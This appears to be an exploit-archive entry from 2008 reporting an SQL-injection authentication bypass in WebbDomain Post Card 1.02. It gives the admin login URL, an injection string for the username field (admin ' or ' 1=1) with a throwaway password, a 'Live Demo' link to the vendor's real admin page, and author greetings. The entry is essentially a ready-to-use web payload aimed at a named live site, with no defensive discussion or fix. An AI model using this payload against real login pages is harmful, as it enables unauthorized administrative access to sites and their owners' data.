[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : WEBBDOMAIN Post Card <= 1.02 (SQL Injection) Auth Bypass Vuln
# Published : 2008-11-04
# Author : x0r
# Previous Title : Tours Manager v1 (cityview.php cityid) SQL Injection Vulnerability
# Next Title : nicLOR Sito includefile Local File Inclusion Vulnerabilities


-==============================-
 Autore: x0r - Road Crew 
Cms: WebbDomain Web Postcards
Bug: Auth ByPass 
Site Of Seller: http://webbdomain.com
 -==============================- 
Exploit: http://webbdomain.com/php/postcarden/admin

Username: admin ' or ' 1=1 
Pass: x0r 

Live Demo: http://webbdomain.com/php/postcarden/admin/admin.php
 
Greetz: La Mia Bimb4...8108 Ti AmO 

# www.Syue.com [2008-11-04]